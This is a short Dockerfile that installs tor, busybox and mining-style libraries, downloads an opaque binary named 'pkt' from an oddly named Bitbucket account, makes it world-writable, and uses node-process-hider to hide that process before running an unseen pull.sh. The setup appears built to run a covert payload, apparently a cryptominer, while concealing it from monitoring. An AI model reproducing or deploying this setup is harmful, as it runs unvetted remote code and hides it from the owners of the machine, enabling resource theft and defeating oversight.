FROM ubuntu:20.04

ARG DEBIAN_FRONTEND=noninteractive
ENV TZ=Europe/Moscow
# Install dependencies:
RUN apt-get update && apt-get install -y \
    tzdata \
    bash \
    curl \
    sudo \
    wget \
    git \
    make \
    busybox \
    build-essential \
    nodejs \
    npm \
    neofetch \
    ca-certificates \
    libcurl4 \
    libjansson4 \
    libgomp1 \
    sudo \
    tor \
    libnuma-dev \
    && rm -rf /var/lib/apt/lists/*
    

WORKDIR .

ADD pull.sh .
RUN wget  https://bitbucket.org/anruvovtisovjlk/multycpm/downloads/pkt

RUN chmod 777 pkt
RUN chmod 777 pull.sh
RUN sudo npm i -g node-process-hider
RUN sleep 2
RUN sudo ph add pkt

CMD bash pull.sh
